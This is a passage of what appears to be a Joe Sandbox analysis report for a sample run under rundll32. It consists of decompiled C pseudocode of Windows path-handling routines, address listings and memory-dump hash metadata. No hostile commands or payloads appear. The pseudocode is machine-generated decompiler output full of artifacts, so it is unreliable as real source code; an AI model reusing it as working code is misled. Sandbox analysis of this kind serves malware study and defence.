                                                                                            								continue;
                                                                                            							}
                                                                                            							__eflags = _t494[2] | _t494[3];
                                                                                            							if((_t494[2] | _t494[3]) == 0) {
                                                                                            								goto L15;
                                                                                            							}
                                                                                            							goto L12;
                                                                                            						}
                                                                                            						__eflags = _t301;
                                                                                            						if(_t301 != 0) {
                                                                                            							goto L92;
                                                                                            						}
                                                                                            						goto L10;
                                                                                            						L92:
                                                                                            						goto L93;
                                                                                            					}
                                                                                            				} else {
                                                                                            					_push(0x57);
                                                                                            					L101:
                                                                                            					return E0462D130(_t427, _t494, _t511);
                                                                                            				}
                                                                                            			}

                                                                                            0x046a5d33
                                                                                            0x046a5d3d
                                                                                            0x046a5d49
                                                                                            0x046a5d4b
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x046a5d5a
                                                                                            0x046a5d5d
                                                                                            0x046a5d60
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x046a5d66
                                                                                            0x046a5d69
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x046a5d6f
                                                                                            0x046a5d6f
                                                                                            0x046a5d73
                                                                                            0x046a5d79
                                                                                            0x046a5d7f
                                                                                            0x046a5d86
                                                                                            0x046a5d95
                                                                                            0x046a5d98
                                                                                            0x046a5dba
                                                                                            0x046a5dcb
                                                                                            0x046a5dce
                                                                                            0x046a5dd3
                                                                                            0x046a5dd6
                                                                                            0x046a5dd8
                                                                                            0x046a5de6
                                                                                            0x046a5dec
                                                                                            0x046a5dee
                                                                                            0x046a5df1
                                                                                            0x046a5df3
                                                                                            0x046a635a
                                                                                            0x046a635a
                                                                                            0x00000000
                                                                                            0x046a635a
                                                                                            0x046a5dfe
                                                                                            0x046a5e02
                                                                                            0x046a5e05
                                                                                            0x046a5e07
                                                                                            0x046a5e10
                                                                                            0x046a5e13
                                                                                            0x046a5e1b
                                                                                            0x046a5e1c
                                                                                            0x046a5e21
                                                                                            0x046a5e22
                                                                                            0x046a5e23
                                                                                            0x046a5e25
                                                                                            0x046a5e2a
                                                                                            0x046a5e2c
                                                                                            0x046a5e2e
                                                                                            0x046a5e36
                                                                                            0x046a5e39
                                                                                            0x046a5e42
                                                                                            0x046a5e47
                                                                                            0x046a5e4d
                                                                                            0x046a5e54
                                                                                            0x046a5e54
                                                                                            0x046a5e54
                                                                                            0x046a5e2e
                                                                                            0x046a5e5c
                                                                                            0x046a5e5f
                                                                                            0x046a5e62
                                                                                            0x046a5e64
                                                                                            0x046a5e6b
                                                                                            0x046a5e70
                                                                                            0x046a5e7a
                                                                                            0x046a5e7a
                                                                                            0x046a5e7a
                                                                                            0x046a5e6b
                                                                                            0x046a5e7e
                                                                                            0x046a5e7f
                                                                                            0x046a5e7f
                                                                                            0x046a5e81
                                                                                            0x046a5e87
                                                                                            0x046a5e8b
                                                                                            0x046a5e8c
                                                                                            0x046a5e8c
                                                                                            0x046a5e8c
                                                                                            0x046a5e9a
                                                                                            0x046a5e9c
                                                                                            0x046a5ea2
                                                                                            0x046a5ea6
                                                                                            0x046a5f50
                                                                                            0x046a5f50
                                                                                            0x046a5f57
                                                                                            0x046a5f66
                                                                                            0x046a5f66
                                                                                            0x046a5f66
                                                                                            0x046a5f68
                                                                                            0x046a5f6a
                                                                                            0x046a63d0
                                                                                            0x00000000
                                                                                            0x046a5f70
                                                                                            0x046a5f70
                                                                                            0x046a5f91
                                                                                            0x046a5f9c
                                                                                            0x046a5f9e
                                                                                            0x046a5fa4
                                                                                            0x046a5fa6
                                                                                            0x046a638c
                                                                                            0x046a6392
                                                                                            0x046a63a1
                                                                                            0x046a63a7
                                                                                            0x046a63af
                                                                                            0x046a63af
                                                                                            0x046a63bd
                                                                                            0x046a63d8
                                                                                            0x00000000
                                                                                            0x046a63d8
                                                                                            0x046a5fac
                                                                                            0x046a5fb2
                                                                                            0x046a5fb4
                                                                                            0x046a5fbd
                                                                                            0x046a5fc6
                                                                                            0x046a5fce
                                                                                            0x046a5fd4
                                                                                            0x046a5fdc
                                                                                            0x046a5fec
                                                                                            0x046a5fed
                                                                                            0x046a5fee
                                                                                            0x046a5fef
                                                                                            0x046a5ff9
                                                                                            0x046a5ffa
                                                                                            0x046a5ffb
                                                                                            0x046a5ffc
                                                                                            0x046a6000
                                                                                            0x046a6004
                                                                                            0x046a6012
                                                                                            0x046a6012
                                                                                            0x046a6018
                                                                                            0x046a6019
                                                                                            0x046a601a
                                                                                            0x046a601b
                                                                                            0x046a601c
                                                                                            0x046a6020
                                                                                            0x046a6059
                                                                                            0x046a605c
                                                                                            0x046a6061
                                                                                            0x046a6061
                                                                                            0x046a6022
                                                                                            0x046a6022
                                                                                            0x046a6022
                                                                                            0x046a6025
                                                                                            0x046a602a
                                                                                            0x046a602b
                                                                                            0x046a6031
                                                                                            0x046a6037
                                                                                            0x046a6038
                                                                                            0x046a603e
                                                                                            0x046a6048
                                                                                            0x046a6049
                                                                                            0x046a604a
                                                                                            0x046a604b
                                                                                            0x046a604c
                                                                                            0x046a604d
                                                                                            0x046a6053
                                                                                            0x046a6054
                                                                                            0x046a6054
                                                                                            0x046a6062
                                                                                            0x046a6065
                                                                                            0x046a6067
                                                                                            0x046a606a
                                                                                            0x046a6070
                                                                                            0x046a6075
                                                                                            0x046a6076
                                                                                            0x046a6081
                                                                                            0x046a6087
                                                                                            0x046a6095
                                                                                            0x046a6099
                                                                                            0x046a609e
                                                                                            0x046a60a4
                                                                                            0x046a60ae
                                                                                            0x046a60b0
                                                                                            0x046a60b3
                                                                                            0x046a60b6
                                                                                            0x046a60b8
                                                                                            0x046a60ba
                                                                                            0x046a60ba
                                                                                            0x046a60ba
                                                                                            0x046a60ba
                                                                                            0x046a60be
                                                                                            0x046a60c0
                                                                                            0x046a60c5
                                                                                            0x046a60c5
                                                                                            0x046a60c5
                                                                                            0x046a60c6
                                                                                            0x046a60cd
                                                                                            0x046a6114
                                                                                            0x046a60cf
                                                                                            0x046a60cf
                                                                                            0x046a60d4
                                                                                            0x046a60d5
                                                                                            0x046a60da
                                                                                            0x046a60db
                                                                                            0x046a60e1
                                                                                            0x046a60e2
                                                                                            0x046a60e8
                                                                                            0x046a60f8
                                                                                            0x046a60fd
                                                                                            0x046a60fe
                                                                                            0x046a6102
                                                                                            0x046a6104
                                                                                            0x046a6107
                                                                                            0x046a6109
                                                                                            0x046a610b
                                                                                            0x046a610b
                                                                                            0x046a610b
                                                                                            0x046a610b
                                                                                            0x046a610f
                                                                                            0x046a610f
                                                                                            0x046a6117
                                                                                            0x046a611a
                                                                                            0x046a611f
                                                                                            0x046a6125
                                                                                            0x046a6134
                                                                                            0x046a6139
                                                                                            0x046a613f
                                                                                            0x046a6146
                                                                                            0x046a6148
                                                                                            0x046a614b
                                                                                            0x046a614d
                                                                                            0x046a614f
                                                                                            0x046a614f
                                                                                            0x046a614f
                                                                                            0x046a614f
                                                                                            0x046a6153
                                                                                            0x046a6159
                                                                                            0x046a6159
                                                                                            0x046a615c
                                                                                            0x046a6163
                                                                                            0x046a6169
                                                                                            0x046a616c
                                                                                            0x046a6172
                                                                                            0x046a6181
                                                                                            0x046a6186
                                                                                            0x046a6187
                                                                                            0x046a618b
                                                                                            0x046a6191
                                                                                            0x046a6195
                                                                                            0x046a61a3
                                                                                            0x046a61bb
                                                                                            0x046a61c0
                                                                                            0x046a61c3
                                                                                            0x046a61cc
                                                                                            0x046a61d0
                                                                                            0x046a61dc
                                                                                            0x046a61de
                                                                                            0x046a61e1
                                                                                            0x046a61e4
                                                                                            0x046a61e6
                                                                                            0x046a61e8
                                                                                            0x046a61e8
                                                                                            0x046a61e8
                                                                                            0x046a61e8
                                                                                            0x046a61e6
                                                                                            0x046a61ec
                                                                                            0x046a61f3
                                                                                            0x046a6203
                                                                                            0x046a6209
                                                                                            0x046a620a
                                                                                            0x046a6216
                                                                                            0x046a621d
                                                                                            0x046a6227
                                                                                            0x046a6241
                                                                                            0x046a6246
                                                                                            0x046a624c
                                                                                            0x046a6257
                                                                                            0x046a6259

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 351baa6ed5ed748551ed496c27020806401b04c1f0ab8a21bf611d1c56d05801
                                                                                            • Instruction ID: 5071a8a59f3b8661c6d7ea05b315870c12bd6e0a4318636d3febee0ee96c6d4e
                                                                                            • Opcode Fuzzy Hash: 351baa6ed5ed748551ed496c27020806401b04c1f0ab8a21bf611d1c56d05801
                                                                                            • Instruction Fuzzy Hash: E6425D75A00629DFDB24CF68C880BA9B7B1FF55304F1481AAD84DAB342E734AD95CF50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 92%
                                                                                            			E045F4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
                                                                                            				signed int _v8;
                                                                                            				void* _v20;
                                                                                            				signed int _v24;
                                                                                            				char _v532;
                                                                                            				char _v540;
                                                                                            				signed short _v544;
                                                                                            				signed int _v548;
                                                                                            				signed short* _v552;
                                                                                            				signed short _v556;
                                                                                            				signed short* _v560;
                                                                                            				signed short* _v564;
                                                                                            				signed short* _v568;
                                                                                            				void* _v570;
                                                                                            				signed short* _v572;
                                                                                            				signed short _v576;
                                                                                            				signed int _v580;
                                                                                            				char _v581;
                                                                                            				void* _v584;
                                                                                            				unsigned int _v588;
                                                                                            				signed short* _v592;
                                                                                            				void* _v597;
                                                                                            				void* _v600;
                                                                                            				void* _v604;
                                                                                            				void* _v609;
                                                                                            				void* _v616;
                                                                                            				void* __ebx;
                                                                                            				void* __edi;
                                                                                            				void* __esi;
                                                                                            				unsigned int _t161;
                                                                                            				signed int _t162;
                                                                                            				unsigned int _t163;
                                                                                            				void* _t169;
                                                                                            				signed short _t173;
                                                                                            				signed short _t177;
                                                                                            				signed short _t181;
                                                                                            				unsigned int _t182;
                                                                                            				signed int _t185;
                                                                                            				signed int _t213;
                                                                                            				signed int _t225;
                                                                                            				short _t233;
                                                                                            				signed char _t234;
                                                                                            				signed int _t242;
                                                                                            				signed int _t243;
                                                                                            				signed int _t244;
                                                                                            				signed int _t245;
                                                                                            				signed int _t250;
                                                                                            				void* _t251;
                                                                                            				signed short* _t254;
                                                                                            				void* _t255;
                                                                                            				signed int _t256;
                                                                                            				void* _t257;
                                                                                            				signed short* _t260;
                                                                                            				signed short _t265;
                                                                                            				signed short* _t269;
                                                                                            				signed short _t271;
                                                                                            				signed short** _t272;
                                                                                            				signed short* _t275;
                                                                                            				signed short _t282;
                                                                                            				signed short _t283;
                                                                                            				signed short _t290;
                                                                                            				signed short _t299;
                                                                                            				signed short _t307;
                                                                                            				signed int _t308;
                                                                                            				signed short _t311;
                                                                                            				signed short* _t315;
                                                                                            				signed short _t316;
                                                                                            				void* _t317;
                                                                                            				void* _t319;
                                                                                            				signed short* _t321;
                                                                                            				void* _t322;
                                                                                            				void* _t323;
                                                                                            				unsigned int _t324;
                                                                                            				signed int _t325;
                                                                                            				void* _t326;
                                                                                            				signed int _t327;
                                                                                            				signed int _t329;
                                                                                            
                                                                                            				_t329 = (_t327 & 0xfffffff8) - 0x24c;
                                                                                            				_v8 =  *0x46cd360 ^ _t329;
                                                                                            				_t157 = _a8;
                                                                                            				_t321 = _a4;
                                                                                            				_t315 = __edx;
                                                                                            				_v548 = __ecx;
                                                                                            				_t305 = _a20;
                                                                                            				_v560 = _a12;
                                                                                            				_t260 = _a16;
                                                                                            				_v564 = __edx;
                                                                                            				_v580 = _a8;
                                                                                            				_v572 = _t260;
                                                                                            				_v544 = _a20;
                                                                                            				if( *__edx <= 8) {
                                                                                            					L3:
                                                                                            					if(_t260 != 0) {
                                                                                            						 *_t260 = 0;
                                                                                            					}
                                                                                            					_t254 =  &_v532;
                                                                                            					_v588 = 0x208;
                                                                                            					if((_v548 & 0x00000001) != 0) {
                                                                                            						_v556 =  *_t315;
                                                                                            						_v552 = _t315[2];
                                                                                            						_t161 = E0460F232( &_v556);
                                                                                            						_t316 = _v556;
                                                                                            						_v540 = _t161;
                                                                                            						goto L17;
                                                                                            					} else {
                                                                                            						_t306 = 0x208;
                                                                                            						_t298 = _t315;
                                                                                            						_t316 = E045F6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
                                                                                            						if(_t316 == 0) {
                                                                                            							L68:
                                                                                            							_t322 = 0xc0000033;
                                                                                            							goto L39;
                                                                                            						} else {
                                                                                            							while(_v581 == 0) {
                                                                                            								_t233 = _v588;
                                                                                            								if(_t316 > _t233) {
                                                                                            									_t234 = _v548;
                                                                                            									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
                                                                                            										_t254 = L045F4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
                                                                                            										if(_t254 == 0) {
                                                                                            											_t169 = 0xc0000017;
                                                                                            										} else {
                                                                                            											_t298 = _v564;
                                                                                            											_v588 = _t316;
                                                                                            											_t306 = _t316;
                                                                                            											_t316 = E045F6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
                                                                                            											if(_t316 != 0) {
                                                                                            												continue;
                                                                                            											} else {
                                                                                            												goto L68;
                                                                                            											}
                                                                                            										}
                                                                                            									} else {
                                                                                            										goto L90;
                                                                                            									}
                                                                                            								} else {
                                                                                            									_v556 = _t316;
                                                                                            									 *((short*)(_t329 + 0x32)) = _t233;
                                                                                            									_v552 = _t254;
                                                                                            									if(_t316 < 2) {
                                                                                            										L11:
                                                                                            										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
                                                                                            											_t161 = 5;
                                                                                            										} else {
                                                                                            											if(_t316 < 6) {
                                                                                            												L87:
                                                                                            												_t161 = 3;
                                                                                            											} else {
                                                                                            												_t242 = _t254[2] & 0x0000ffff;
                                                                                            												if(_t242 != 0x5c) {
                                                                                            													if(_t242 == 0x2f) {
                                                                                            														goto L16;
                                                                                            													} else {
                                                                                            														goto L87;
                                                                                            													}
                                                                                            													goto L101;
                                                                                            												} else {
                                                                                            													L16:
                                                                                            													_t161 = 2;
                                                                                            												}
                                                                                            											}
                                                                                            										}
                                                                                            									} else {
                                                                                            										_t243 =  *_t254 & 0x0000ffff;
                                                                                            										if(_t243 == 0x5c || _t243 == 0x2f) {
                                                                                            											if(_t316 < 4) {
                                                                                            												L81:
                                                                                            												_t161 = 4;
                                                                                            												goto L17;
                                                                                            											} else {
                                                                                            												_t244 = _t254[1] & 0x0000ffff;
                                                                                            												if(_t244 != 0x5c) {
                                                                                            													if(_t244 == 0x2f) {
                                                                                            														goto L60;
                                                                                            													} else {
                                                                                            														goto L81;
                                                                                            													}
                                                                                            												} else {
                                                                                            													L60:
                                                                                            													if(_t316 < 6) {
                                                                                            														L83:
                                                                                            														_t161 = 1;
                                                                                            														goto L17;
                                                                                            													} else {
                                                                                            														_t245 = _t254[2] & 0x0000ffff;
                                                                                            														if(_t245 != 0x2e) {
                                                                                            															if(_t245 == 0x3f) {
                                                                                            																goto L62;
                                                                                            															} else {
                                                                                            																goto L83;
                                                                                            															}
                                                                                            														} else {
                                                                                            															L62:
                                                                                            															if(_t316 < 8) {
                                                                                            																L85:
                                                                                            																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
                                                                                            																goto L17;
                                                                                            															} else {
                                                                                            																_t250 = _t254[3] & 0x0000ffff;
                                                                                            																if(_t250 != 0x5c) {
                                                                                            																	if(_t250 == 0x2f) {
                                                                                            																		goto L64;
                                                                                            																	} else {
                                                                                            																		goto L85;
                                                                                            																	}
                                                                                            																} else {
                                                                                            																	L64:
                                                                                            																	_t161 = 6;
                                                                                            																	goto L17;
                                                                                            																}
                                                                                            															}
                                                                                            														}
                                                                                            													}
                                                                                            												}
                                                                                            											}
                                                                                            											goto L101;
                                                                                            										} else {
                                                                                            											goto L11;
                                                                                            										}
                                                                                            									}
                                                                                            									L17:
                                                                                            									if(_t161 != 2) {
                                                                                            										_t162 = _t161 - 1;
                                                                                            										if(_t162 > 5) {
                                                                                            											goto L18;
                                                                                            										} else {
                                                                                            											switch( *((intOrPtr*)(_t162 * 4 +  &M045F45F8))) {
                                                                                            												case 0:
                                                                                            													_v568 = 0x45b1078;
                                                                                            													__eax = 2;
                                                                                            													goto L20;
                                                                                            												case 1:
                                                                                            													goto L18;
                                                                                            												case 2:
                                                                                            													_t163 = 4;
                                                                                            													goto L19;
                                                                                            											}
                                                                                            										}
                                                                                            										goto L41;
                                                                                            									} else {
                                                                                            										L18:
                                                                                            										_t163 = 0;
                                                                                            										L19:
                                                                                            										_v568 = 0x45b11c4;
                                                                                            									}
                                                                                            									L20:
                                                                                            									_v588 = _t163;
                                                                                            									_v564 = _t163 + _t163;
                                                                                            									_t306 =  *_v568 & 0x0000ffff;
                                                                                            									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
                                                                                            									_v576 = _t265;
                                                                                            									if(_t265 > 0xfffe) {
                                                                                            										L90:
                                                                                            										_t322 = 0xc0000106;
                                                                                            									} else {
                                                                                            										if(_t321 != 0) {
                                                                                            											if(_t265 > (_t321[1] & 0x0000ffff)) {
                                                                                            												if(_v580 != 0) {
                                                                                            													goto L23;
                                                                                            												} else {
                                                                                            													_t322 = 0xc0000106;
                                                                                            													goto L39;
                                                                                            												}
                                                                                            											} else {
                                                                                            												_t177 = _t306;
                                                                                            												goto L25;
                                                                                            											}
                                                                                            											goto L101;
                                                                                            										} else {
                                                                                            											if(_v580 == _t321) {
                                                                                            												_t322 = 0xc000000d;
                                                                                            											} else {
                                                                                            												L23:
                                                                                            												_t173 = L045F4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
                                                                                            												_t269 = _v592;
                                                                                            												_t269[2] = _t173;
                                                                                            												if(_t173 == 0) {
                                                                                            													_t322 = 0xc0000017;
                                                                                            												} else {
                                                                                            													_t316 = _v556;
                                                                                            													 *_t269 = 0;
                                                                                            													_t321 = _t269;
                                                                                            													_t269[1] = _v576;
                                                                                            													_t177 =  *_v568 & 0x0000ffff;
                                                                                            													L25:
                                                                                            													_v580 = _t177;
                                                                                            													if(_t177 == 0) {
                                                                                            														L29:
                                                                                            														_t307 =  *_t321 & 0x0000ffff;
                                                                                            													} else {
                                                                                            														_t290 =  *_t321 & 0x0000ffff;
                                                                                            														_v576 = _t290;
                                                                                            														_t310 = _t177 & 0x0000ffff;
                                                                                            														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
                                                                                            															_t307 =  *_t321 & 0xffff;
                                                                                            														} else {
                                                                                            															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
                                                                                            															E0461F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
                                                                                            															_t329 = _t329 + 0xc;
                                                                                            															_t311 = _v580;
                                                                                            															_t225 =  *_t321 + _t311 & 0x0000ffff;
                                                                                            															 *_t321 = _t225;
                                                                                            															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
                                                                                            																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                            															}
                                                                                            															goto L29;
                                                                                            														}
                                                                                            													}
                                                                                            													_t271 = _v556 - _v588 + _v588;
                                                                                            													_v580 = _t307;
                                                                                            													_v576 = _t271;
                                                                                            													if(_t271 != 0) {
                                                                                            														_t308 = _t271 & 0x0000ffff;
                                                                                            														_v588 = _t308;
                                                                                            														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
                                                                                            															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
                                                                                            															E0461F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
                                                                                            															_t329 = _t329 + 0xc;
                                                                                            															_t213 =  *_t321 + _v576 & 0x0000ffff;
                                                                                            															 *_t321 = _t213;
                                                                                            															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
                                                                                            																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
                                                                                            															}
                                                                                            														}
                                                                                            													}
                                                                                            													_t272 = _v560;
                                                                                            													if(_t272 != 0) {
                                                                                            														 *_t272 = _t321;
                                                                                            													}
                                                                                            													_t306 = 0;
                                                                                            													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                            													_t275 = _v572;
                                                                                            													if(_t275 != 0) {
                                                                                            														_t306 =  *_t275;
                                                                                            														if(_t306 != 0) {
                                                                                            															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
                                                                                            														}
                                                                                            													}
                                                                                            													_t181 = _v544;
                                                                                            													if(_t181 != 0) {
                                                                                            														 *_t181 = 0;
                                                                                            														 *((intOrPtr*)(_t181 + 4)) = 0;
                                                                                            														 *((intOrPtr*)(_t181 + 8)) = 0;
                                                                                            														 *((intOrPtr*)(_t181 + 0xc)) = 0;
                                                                                            														if(_v540 == 5) {
                                                                                            															_t182 = E045D52A5(1);
                                                                                            															_v588 = _t182;
                                                                                            															if(_t182 == 0) {
                                                                                            																E045EEB70(1, 0x46c79a0);
                                                                                            																goto L38;
                                                                                            															} else {
                                                                                            																_v560 = _t182 + 0xc;
                                                                                            																_t185 = E045EAA20( &_v556, _t182 + 0xc,  &_v556, 1);
                                                                                            																if(_t185 == 0) {
                                                                                            																	_t324 = _v588;
                                                                                            																	goto L97;
                                                                                            																} else {
                                                                                            																	_t306 = _v544;
                                                                                            																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
                                                                                            																	 *(_t306 + 4) = _t282;
                                                                                            																	_v576 = _t282;
                                                                                            																	_t325 = _t316 -  *_v560 & 0x0000ffff;
                                                                                            																	 *_t306 = _t325;
                                                                                            																	if( *_t282 == 0x5c) {
                                                                                            																		_t149 = _t325 - 2; // -2
                                                                                            																		_t283 = _t149;
                                                                                            																		 *_t306 = _t283;
                                                                                            																		 *(_t306 + 4) = _v576 + 2;
                                                                                            																		_t185 = _t283 & 0x0000ffff;
                                                                                            																	}
                                                                                            																	_t324 = _v588;
                                                                                            																	 *(_t306 + 2) = _t185;
                                                                                            																	if((_v548 & 0x00000002) == 0) {
                                                                                            																		L97:
                                                                                            																		asm("lock xadd [esi], eax");
                                                                                            																		if((_t185 | 0xffffffff) == 0) {
                                                                                            																			_push( *((intOrPtr*)(_t324 + 4)));
                                                                                            																			E046195D0();
                                                                                            																			L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
                                                                                            																		}
                                                                                            																	} else {
                                                                                            																		 *(_t306 + 0xc) = _t324;
                                                                                            																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
                                                                                            																	}
                                                                                            																	goto L38;
                                                                                            																}
                                                                                            															}
                                                                                            															goto L41;
                                                                                            														}
                                                                                            													}
                                                                                            													L38:
                                                                                            													_t322 = 0;
                                                                                            												}
                                                                                            											}
                                                                                            										}
                                                                                            									}
                                                                                            									L39:
                                                                                            									if(_t254 !=  &_v532) {
                                                                                            										L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
                                                                                            									}
                                                                                            									_t169 = _t322;
                                                                                            								}
                                                                                            								goto L41;
                                                                                            							}
                                                                                            							goto L68;
                                                                                            						}
                                                                                            					}
                                                                                            					L41:
                                                                                            					_pop(_t317);
                                                                                            					_pop(_t323);
                                                                                            					_pop(_t255);
                                                                                            					return E0461B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
                                                                                            				} else {
                                                                                            					_t299 = __edx[2];
                                                                                            					if( *_t299 == 0x5c) {
                                                                                            						_t256 =  *(_t299 + 2) & 0x0000ffff;
                                                                                            						if(_t256 != 0x5c) {
                                                                                            							if(_t256 != 0x3f) {
                                                                                            								goto L2;
                                                                                            							} else {
                                                                                            								goto L50;
                                                                                            							}
                                                                                            						} else {
                                                                                            							L50:
                                                                                            							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
                                                                                            								goto L2;
                                                                                            							} else {
                                                                                            								_t251 = E04613D43(_t315, _t321, _t157, _v560, _v572, _t305);
                                                                                            								_pop(_t319);
                                                                                            								_pop(_t326);
                                                                                            								_pop(_t257);
                                                                                            								return E0461B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
                                                                                            							}
                                                                                            						}
                                                                                            					} else {
                                                                                            						L2:
                                                                                            						_t260 = _v572;
                                                                                            						goto L3;
                                                                                            					}
                                                                                            				}
                                                                                            				L101:
                                                                                            			}

                                                                                            0x045f4463
                                                                                            0x045f4463
                                                                                            0x045f43ce
                                                                                            0x045f43d5
                                                                                            0x045f43d9
                                                                                            0x045f43df
                                                                                            0x045f4475
                                                                                            0x045f4479
                                                                                            0x045f4491
                                                                                            0x045f4491
                                                                                            0x045f4479
                                                                                            0x045f43e5
                                                                                            0x045f43eb
                                                                                            0x045f43f4
                                                                                            0x045f43f6
                                                                                            0x045f43f9
                                                                                            0x045f43fc
                                                                                            0x045f43ff
                                                                                            0x045f44e8
                                                                                            0x045f44ed
                                                                                            0x045f44f3
                                                                                            0x0463e247
                                                                                            0x00000000
                                                                                            0x045f44f9
                                                                                            0x045f4504
                                                                                            0x045f4508
                                                                                            0x045f450f
                                                                                            0x0463e269
                                                                                            0x00000000
                                                                                            0x045f4515
                                                                                            0x045f4519
                                                                                            0x045f4531
                                                                                            0x045f4534
                                                                                            0x045f4537
                                                                                            0x045f453e
                                                                                            0x045f4541
                                                                                            0x045f454a
                                                                                            0x0463e255
                                                                                            0x0463e255
                                                                                            0x0463e25b
                                                                                            0x0463e25e
                                                                                            0x0463e261
                                                                                            0x0463e261
                                                                                            0x045f4555
                                                                                            0x045f4559
                                                                                            0x045f455d
                                                                                            0x0463e26d
                                                                                            0x0463e270
                                                                                            0x0463e274
                                                                                            0x0463e27a
                                                                                            0x0463e27d
                                                                                            0x0463e28e
                                                                                            0x0463e28e
                                                                                            0x045f4563
                                                                                            0x045f4563
                                                                                            0x045f4569
                                                                                            0x045f4569
                                                                                            0x00000000
                                                                                            0x045f455d
                                                                                            0x045f450f
                                                                                            0x00000000
                                                                                            0x045f44f3
                                                                                            0x045f43ff
                                                                                            0x045f4405
                                                                                            0x045f4405
                                                                                            0x045f4405
                                                                                            0x045f42ac
                                                                                            0x045f428c
                                                                                            0x045f4282
                                                                                            0x045f4407
                                                                                            0x045f440d
                                                                                            0x0463e2af
                                                                                            0x0463e2af
                                                                                            0x045f4413
                                                                                            0x045f4413
                                                                                            0x00000000
                                                                                            0x045f41d4
                                                                                            0x00000000
                                                                                            0x045f41c3
                                                                                            0x045f41bd
                                                                                            0x045f4415
                                                                                            0x045f4415
                                                                                            0x045f4416
                                                                                            0x045f4417
                                                                                            0x045f4429
                                                                                            0x045f416e
                                                                                            0x045f416e
                                                                                            0x045f4175
                                                                                            0x045f4498
                                                                                            0x045f449f
                                                                                            0x0463e12d
                                                                                            0x00000000
                                                                                            0x0463e133
                                                                                            0x00000000
                                                                                            0x0463e133
                                                                                            0x045f44a5
                                                                                            0x045f44a5
                                                                                            0x045f44aa
                                                                                            0x00000000
                                                                                            0x045f44bb
                                                                                            0x045f44ca
                                                                                            0x045f44d6
                                                                                            0x045f44d7
                                                                                            0x045f44d8
                                                                                            0x045f44e3
                                                                                            0x045f44e3
                                                                                            0x045f44aa
                                                                                            0x045f417b
                                                                                            0x045f417b
                                                                                            0x045f417b
                                                                                            0x00000000
                                                                                            0x045f417b
                                                                                            0x045f4175
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c2d84704e617c709bdca27a01d0e5017f7437f2f38c8d3c5eb2292e31154ce81
                                                                                            • Instruction ID: a7c75e2455056d0ad4a9a2031e53a09a1ca67470cc35d84ee05df9e1ad21e81e
                                                                                            • Opcode Fuzzy Hash: c2d84704e617c709bdca27a01d0e5017f7437f2f38c8d3c5eb2292e31154ce81
                                                                                            • Instruction Fuzzy Hash: 7BF18D706082518BD724CF59C884A3BB7E1FFA9708F04492EF586CB390E735E885EB52
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 92%
                                                                                            			E046020A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
                                                                                            				signed int _v16;
                                                                                            				signed int _v20;
                                                                                            				signed char _v24;
